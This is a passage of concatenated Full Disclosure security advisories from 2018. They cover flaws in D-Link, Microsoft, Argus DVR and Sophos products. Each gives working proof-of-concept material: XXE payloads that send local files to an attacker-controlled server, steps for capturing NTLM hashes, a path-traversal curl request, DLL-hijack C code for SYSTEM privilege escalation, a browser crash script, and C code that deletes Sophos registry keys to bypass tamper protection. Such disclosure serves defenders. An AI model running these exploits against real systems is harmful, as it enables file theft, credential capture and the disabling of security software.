October 31, 2018 No reply from vendor November 8, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-15516 / D- LINK Central WifiManager CWM-100 / FTP Server PORT Bounce Scan
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-FTP-SERVER-PORT-BOUNCE-SCAN.txt [+] ISR: ApparitionSec ***Greetz: indoushka | Eduardo B.*** [Vendor] us.dlink.com [Product] D-LINK Central WifiManager (CWM 100) Version 1.03 r0098 http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/ D-Link’s free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks. [Vulnerability Type] FTP Server PORT Bounce Scan [CVE Reference] CVE-2018-15516 [Security Issue] The FTP Server component of the D-LINK Central WifiManager can be used as a man-in-the-middle machine allowing PORT Command bounce scan attacks. This vulnerability allows remote attackers to abuse your network and discreetly conduct network port scanning. Victims will then think these scans are originating from the D-LINK network running the afflicted FTP Server and not you. [Exploit/POC] D-LINK CWM-100 FTP Server listens on port 9000 (default), default creds are "admin" "admin" nmap -v -b admin:admin@VICTIM-IP:9000 -p 21,22,23,53,445 [POC Video URL] https://vimeo.com/299797225 [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: August 8, 2018 Vendor acknowledgement: August 8, 2018 CVE assigned Mitre: August 18, 2018 Request update: August 31, 2018 No reply from vendor Request update: September 6, 2018 Vendor: "R has begun this month to patch your report." : September 12, 2018 Request update: October 3, 2018 Vendor: "will release a new beta for QA verification by end of this month 10'2018." Request update: October 16, 2018 no reply from vendor Request update: October 23, 2018 Vendor: "It still is schedule to be released by the 31st." : October 23, 2018 Inform vendor of disclosure by November 8, 2018 : October 31, 2018 No reply from vendor November 8, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-8533 Microsoft SQL Server Management Studio 17.9 / 18.0 Preview 4 / REGSRVR file handling XML Injection
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-REGSRVR-FILES-XML-INJECTION-CVE-2018-8533.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] SQL Server Management Studio 17.9 SQL Server Management Studio 18.0 (Preview 4) SQL Server Management Studio is a software application first launched with Microsoft SQL Server 2005 that is used for configuring, managing, and administering all components within Microsoft SQL Server. The tool includes both script editors and graphical tools which work with objects and features of the server. [Vulnerability Type] XML External Entity Injection [CVE Reference] CVE-2018-8533 [Security Issue] This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of REGSRVR files. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process. [Exploit/POC] 1) python -m SimpleHTTPServer 2) "POC.xml" http://127.0.0.1:8000/payload.dtd;> %dtd;]> 3) "payload.dtd" http://127.0.0.1:8000?%file;'>"> %all; Result: Serving HTTP on 0.0.0.0 port 8000 ... 127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /payload.dtd HTTP/1.1" 200 - 127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 - 127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 - [References] https://www.zerodayinitiative.com/advisories/ZDI-18-1133/ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8533 [Network Access] Remote [Disclosure Timeline] Notification: Trend Micro Zero Day Initiative Program Vendor reply: Release of advisory patch Tuesday : October 9, 2018 October 10, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-8527 Microsoft SQL Server Management Studio 17.9 / 18.0 Preview 4 / xel filetype XML Injection
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XEL-FILETYPE-XML-INJECTION-CVE-2018-8527.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] SQL Server Management Studio 17.9 SQL Server Management Studio 18.0 (Preview 4) SQL Server Management Studio is a software application first launched with Microsoft SQL Server 2005 that is used for configuring, managing, and administering all components within Microsoft SQL Server. The tool includes both script editors and graphical tools which work with objects and features of the server. [Vulnerability Type] XML External Entity Injection [CVE Reference] CVE-2018-8527 [Security Issue] This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of XEL files. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process. [References] https://www.zerodayinitiative.com/advisories/ZDI-18-1131/ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527 [Exploit/POC] python -m SimpleHTTPServer (listens Port 8000) "evil.xel" (Extended Event Log File) http://127.0.0.1:8000/payload.dtd;> %dtd;]> "payload.dtd" http://127.0.0.1:8000?%file;'>"> %all; OR Steal NTLM hashes Kali linux /usr/share/responder/tools responder -I eth0 -rv "evil.xel" %dtd;]> Result: Forced authentication and NTLM hash captured [Network Access] Remote Notification: Trend Micro Zero Day Initiative Program Vendor reply: Release of advisory patch Tuesday : October 9, 2018 October 10, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-8532 / Microsoft SQL Server Management Studio 17.9 / 18.0 Preview 4 / XML Injection
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XMLA-FILETYPE-XML-INJECTION-CVE-2018-8532.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] SQL Server Management Studio 17.9 SQL Server Management Studio 18.0 (Preview 4) SQL Server Management Studio is a software application first launched with Microsoft SQL Server 2005 that is used for configuring, managing, and administering all components within Microsoft SQL Server. The tool includes both script editors and graphical tools which work with objects and features of the server. [Vulnerability Type] XML External Entity Injection [CVE Reference] CVE-2018-8532 [Security Issue] This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of XMLA files. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process. [Exploit/POC] 1) python -m SimpleHTTPServer 2) "test.xmla" http://127.0.0.1:8000/payload.dtd;> %dtd;]> 3) "payload.dtd" http://127.0.0.1:8000?%file;'>"> %all; Result: Serving HTTP on 0.0.0.0 port 8000 ... 127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /payload.dtd HTTP/1.1" 200 - 127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 - 127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 - [References] https://www.zerodayinitiative.com/advisories/ZDI-18-1132/ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8532 [Network Access] Remote [Disclosure Timeline] Notification: Trend Micro Zero Day Initiative Program Vendor reply: Release of advisory patch Tuesday : October 9, 2018 October 10, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] ZDI-CAN-6307 / Microsoft Baseline Security Analyzer v2.3 / XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-BASELINE-ANALYZER-v2.3-XML-INJECTION.txt [+] ISR: Apparition Security [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] Microsoft Baseline Security Analyzer v2.3 Microsoft Baseline Security Analyzer (MBSA) is a software tool released by Microsoft to determine security state by assessing missing security updates and less-secure security settings within Microsoft Windows, Windows components such as Internet Explorer, IIS web server, and products Microsoft SQL Server, and Microsoft Office macro settings. [Vulnerability Type] XML External Entity Injection [ZDI Reference] ZDI-CAN-6307 [Security Issue] Microsoft Baseline Security Analyzer allows local files to be exfiltrated to a remote attacker controlled server if a user opens a specially crafted ".mbsa" file. [Exploit/POC] Install MBSA https://www.microsoft.com/en-us/download/details.aspx?id=7558 1) "evil.mbsa" http://127.0.0.1:8000/payload.dtd;> %dtd;]> 2) "payload.dtd" http://127.0.0.1:8000?%file;'>"> %all; When victim attempts open file they get prompted "Do you want to let this app make changes to your device?" However, it also indicates it is a "verified publisher" namely Microsoft. After opening the local users files can be exfiltrated to a remote server. Moreover, we can use this to steal NTLM hashes. Using Forced Authentication to steal NTLM hashes 2) msf > use auxiliary/server/capture/smb msf auxiliary(smb) > exploit -j "evil.mbsa" %dtd;]> Result: credentials captured by remote sever [Network Access] Remote [Severity] High [Disclosure Timeline] Notification: Trend Micro Zero Day Initiative Program Vendor reply: Program deprecated September 8, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Argus Surveillance DVR - 4.0.0.0 / Unauthenticated Directory Traversal File Disclosure
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt [+] ISR: Apparition Security Greetz: ***Greetz: indoushka | Eduardo | GGA*** [Vendor] www.argussurveillance.com [Product] Argus Surveillance DVR - 4.0.0.0 Our DVR software provides scheduled, continuous or activated upon motion detection video recording. You can monitor unlimited number of cameras, through Internet or on-site. When our surveillance software detects motion in the monitored area, it sounds alarm, e-mails captured images, or records video. This is security surveillance IP camera software. It has features to place image overlays and date/time stamps, adjust picture size / quality, and Pan/Tilt/Zoom control. [Vulnerability Type] Directory Traversal [CVE Reference] CVE-2018-15745 [Security Issue] Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter. [Affected Component] WEBACCOUNT.CGI RESULTPAGE parameter [Exploit/POC] curl " http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini=1== " ; for 16-bit app support woafont=dosapp.fon EGA80WOA.FON=EGA80WOA.FON EGA40WOA.FON=EGA40WOA.FON CGA80WOA.FON=CGA80WOA.FON CGA40WOA.FON=CGA40WOA.FON wave=mmdrv.dll timer=timer.drv [Video POC URL] https://vimeo.com/287115273 [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: August 17, 2018 Second attempt: August 21, 2018 CVE Assigned Mitre: August 23, 2018 August 28, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Argus Surveillance DVR - 4.0.0.0 / SYSTEM Privilege Escalation
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-SYSTEM-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec
Greetz: ***Greetz: indoushka | Eduardo | GGA***
[Vendor]
www.argussurveillance.com
[Product]
Argus Surveillance DVR - 4.0.0.0
Our DVR software provides scheduled, continuous or activated upon motion
detection video recording. You can monitor unlimited number of cameras,
through Internet or on-site.
When our surveillance software detects motion in the monitored area, it
sounds alarm, e-mails captured images, or records video.
This is security surveillance IP camera software. It has features to place
image overlays and date/time stamps, adjust picture size / quality, and
Pan/Tilt/Zoom control.
[Vulnerability Type]
SYSTEM Privilege Escalation
[CVE Reference]
N/A
[Security Issue]
Argus Surveillance DVR 4.0.0.0 devices allow Trojan File SYSTEM Privilege
Escalation.
Placing a Trojan File DLL named "gsm_codec.dll" in Argus application
directory will lead to arbitrary code execution with SYSTEM integrity.
[Affected Component]
DVRWatchdog.exe
[Exploit/POC]
create DLL 32bit DLL named "gsm_codec.dll" and place in App Dir, launch
Argus DVR tada! your now SYSTEM.
#include
/* hyp3rlinx */
/*
gcc -c -m32 gsm_codec.c
gcc -shared -m32 -o gsm_codec.dll gsm_codec.o
*/
void systemo(){
MessageBox( 0, "3c184981367094fce3ab70efc3b44583" , "philbin :)" , MB_YESNO
+ MB_ICONQUESTION );
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
switch(fdwReason){
case DLL_PROCESS_ATTACH:{
systemo();
break;
}
case DLL_PROCESS_DETACH:{
systemo();
break;
}
case DLL_THREAD_ATTACH:{
systemo();
break;
}
case DLL_THREAD_DETACH:{
systemo();
break;
}
}
return TRUE;
}
[Video POC URL]
https://vimeo.com/287115698
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
Vendor Notification: August 17, 2018
Second attempt: August 21, 2018
CVE Assigned Mitre: August 23, 2018
August 28, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Windows "FxCop" v10-12 / XML External Entity Injection
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MS-WINDOWS-FXCOP-XML-EXTERNAL-ENTITY-INJECTION.txt [+] ISR: Apparition Security ***Greetz: indoushka|Eduardo|Dirty0tis*** Vendor: www.microsoft.com Product: === Microsoft Windows "FxCop" v10-12 Vulnerability Type: === XML External Entity CVE Reference: == N/A Security Issue: FxCop is vulnerable to XML injection attacks allowing local file exfiltration and or NTLM hash theft. Tested in Windows 7 and Windows 10 download SDK it works in both. If you have the the particular SDK in question it is probably there but needs to be installed as it was for me. MSRC Response: = "We’ve determined that the issue was fixed in FxCop 14.0, but that it repros in versions earlier than that (e.g. 10.0 -12.0 as far as SDKs are concerned, with version 13.0 skipped). We have confirmation that the SDKs for Win8+ don’t ship FxCop We are going to pull Win7 SDKs containing v10-v12 of FxCop. Dissecting SDKs and replacing the tool in situ is fraught with peril, and chaining in a later FxCop to run after an SDK’s install (if even feasible) would just draw attention to the problem. Visual Studio (specifically, C++) ships a trimmed-down version of the Windows 7 SDK, but it does not include FxCop, and so is unaffected. In summary, newer versions of FxCop are unaffected and we will pull afflicted versions from availability." Exploit/POC: = 1) python -m SimpleHTTPServer 2) "POC.FxCop" http://ATTACKER-IP:8000/payload.dtd;> %dtd;]> 3) "payload.dtd" http://ATTACKER-IP:8000?%file;'>"> %all; 4) Import or Open "POC.FxCop" file in FxCop Files get exfiltrated to attacker server. Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: March 15, 2018 Vendor opens MSRC Case 44322?: March 16, 2018 Vendor reproduces issue : April 6, 2018 Vendor decides to pull all download links instead of advisory or fix : April 9, 2018 May 9, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft (Win 10) InternetExplorer v11.371.16299.0 - Denial Of Service
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-(Win-10)-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
===www.microsoft.com
Product:
Internet Explorer (Windows 10)
v11.371.16299.0
Internet Explorer is a series of graphical web browsers developed by
Microsoft and included in the Microsoft Windows line of operating
systems, starting in 1995.
Vulnerability Type:
==
Denial Of Service
CVE Reference:
==
N/A
Security Issue:
A null pointer de-reference (read) results in an InternetExplorer
Denial of Service (crash) when MSIE encounters an specially crafted
HTML HREF tag containing an empty reference for certain Windows file
types. Upon IE crash it will at times daringly attempt to restart
itself,
if that occurs and user is prompted by IE to restore their browser
session, then selecting this option so far in my tests has shown to
repeat the
crash all over again. This can be leveraged by visiting a hostile
webpage or link to crash an end users MSIE browser.
Referencing some of the following extensions .exe:, .com:, .pif:,
.bat: and .scr: should produce the same :)
Tested Windows 10
Stack Dump:
==
(2e8c.27e4): Access violation - code c005 (first/second chance not
available)
ntdll!NtWaitForMultipleObjects+0x14:
7ffa`be5f0e14 c3 ret
0:015> r
rax=005b rbx=0003 rcx=0003
rdx=00cca6efd3a8 rsi= rdi=0003
rip=7ffabe5f0e14 rsp=00cca6efcfa8 rbp=
r8= r9= r10=
r11=0246 r12=0010 r13=00cca6efd3a8
r14= r15=
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246
ntdll!NtWaitForMultipleObjects+0x14:
7ffa`be5f0e14 c3 ret
CONTEXT: (.ecxr)
rax= rbx=01fd4a2ec9d8 rcx=
rdx=7ffabb499398 rsi=01fd4a5b0ce0 rdi=
rip=7ffabb7fc646 rsp=00cca6efe4f8 rbp=00cca6efe600
r8= r9=8000 r10=7ffabb499398
r11= r12= r13=7ffabb48d060
r14=0002 r15=0001
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
KERNELBASE!StrCmpICW+0x6:
7ffa`bb7fc646 450fb70bmovzx r9d,word ptr [r11]
ds:`=
Resetting default scope
FAULTING_IP:
KERNELBASE!StrCmpICW+6
7ffa`bb7fc646 450fb70bmovzx r9d,word ptr [r11]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 7ffabb7fc646 (KERNELBASE!StrCmpICW+0x0006)
ExceptionCode: c005 (Access violation)
ExceptionFlags:
NumberParameters: 2
Parameter[0]:
Parameter[1]:
Attempt to read from address
DEFAULT_BUCKET_ID: NULL_POINTER_READ
PROCESS_NAME: iexplore.exe
POC video URL:
==https://vimeo.com/265691256/
Exploit/POC:
1) Run below python script to create "IE-Win10-Crasha.html"
2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10
payload=('\n'+
'MSIE v11.371.16299 Denial Of Service by hyp3rlinx \n'+
'crashy ware shee\n'+
'\n'+
'Tested successfully on Windows 10\n'+
'\n'
'function doit(){\n'+
'document.getElementById("hate").click();\n'
'alert("DOH!");\n'+
'obj.click();\n'+
'obj.click();\n'+
'}\n'+
'setInterval("doit()", 2000)\n'+
'')
file=open("IE-Win10-Crasha.html","w")
file.write(payload)
file.close()
print 'MS InternetExplorer (Win 10) '
print 'Denial Of Service File Created.'
print 'hyp3rlinx'
Network Access:
===
Remote
Severity:
=
Medium
Disclosure Timeline:
=
Vendor Notification: April 18, 2018
vendor closes thread : April 19, 2018
April 20, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure m
Re: [FD] CVE-2018-4863 Sophos Endpoint Protection v10.7 / Tamper Protection Bypass
should have included more details for this report, no, you need be admin.
I believe the enhanced tamper protection safeguards the services even in
safe mode among other things like uninstalling etc...
On Wed, Apr 4, 2018 at 3:48 AM, Buherátor <buhera...@gmail.com> wrote:
> The affected key under HKLM is writable by regular users? A Get-ACL[1]
> output would be appreciated!
>
> And why do you put a batch script inside C code? o.O
>
> [1] https://docs.microsoft.com/en-us/powershell/module/
> microsoft.powershell.security/get-acl?view=powershell-6
>
> Buherátor - @buherator
> PGP: 1DD5 6AFB 0660 4106 7B70 4F71 B84C 47BD 86EA 1855
>
>
> 2018-04-04 6:04 GMT+02:00 hyp3rlinx <apparition...@gmail.com>:
> > [+] Credits: John Page (aka hyp3rlinx)
> > [+] Website: hyp3rlinx.altervista.org
> > [+] Source:
> > http://hyp3rlinx.altervista.org/advisories/SOPHOS-
> ENDPOINT-PROTECTION-v10.7-TAMPER-PROTECTION-BYPASS-CVE-2018-4863.txt
> > [+] ISR: Apparition Security
> >
> >
> >
> > Vendor:
> > =
> > www.sophos.com
> >
> >
> >
> > Product:
> > ===
> > Sophos Endpoint Protection v10.7
> >
> > Sophos Endpoint Protection helps secure your workstation by adding
> > prevention, detection, and response technology on top of your operating
> > system.
> > Sophos Endpoint Protection is designed for workstations running Windows
> and
> > macOS. It adds exploit technique mitigations, CryptoGuard
> anti-ransomware,
> > anti-malware, web security, malicious traffic detection, and deep system
> > cleanup.
> >
> >
> >
> > Vulnerability Type:
> > ===
> > Tamper Protection Bypass
> >
> >
> > CVE Reference:
> > ==
> > CVE-2018-4863
> >
> >
> > Security Issue:
> >
> > Sophos Endpoint Protection offers an enhanced tamper protection mechanism
> > disallowing changes to be made to the Windows registry
> > by creating and setting a special registry key "SEDEnabled" as follows:
> >
> > HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint
> > Defense\TamperProtection\Config
> > Create the following registry key:
> > "SEDEnabled"=dword:0001"
> >
> > From "https://community.sophos.com/kb/en-us/124376; documentation:
> > "You must enable the basic Tamper Protection feature on an endpoint in
> > order to use the Enhanced Tamper Protection"
> >
> > However, this protection mechanism can be bypassed by deleting the
> > following registry key as it is not sufficiently protected.
> > "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos
> Endpoint
> > Defense\"
> >
> > By deleting this key this bypasses the Sophos Endpoint "Enhanced Tamper
> > Protection" once the system has been rebooted.
> > Attackers can then create arbitrary registry keys or edit keys and
> settings
> > under the protected "tamper" protection config key.
> > The issue undermines the integrity of the endpoint protection as deleting
> > this key stops the tamper protect driver from loading.
> >
> >
> > SAV OPM customers are unaffected from 10.8.1 onwards, all Central managed
> > customers customers are unaffected.
> > All SAV OPM Preview subscribers have had the fix since 2018-03-01.
> >
> >
> >
> > Exploit/POC:
> > =
> > Compile the below malicious POC "C" code and run on target, PC will
> reboot
> > then we pwn.
> >
> > gcc -o sophos-poc.exe sophos-poc.c
> >
> > "sophos-poc.c"
> >
> > /***SOPHOS ANTIVIRUS ENDPOINT ENHANCED TAMPER PROTECTION BYPASS
> > Even with "SEDEnabled"=dword:0001" set in registry to prevent
> tampering
> > https://community.sophos.com/kb/en-us/124376
> > By hyp3rlinx **/
> >
> > int main(void){
> > system("reg delete
> > \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos
> Endpoint
> > Defense\" /f");
> > system("shutdown -t 0 -r -f");
> > return 0;
> > }
> >
> >
> >
> > Network Access:
> > ===
> > Local
> >
> >
> >
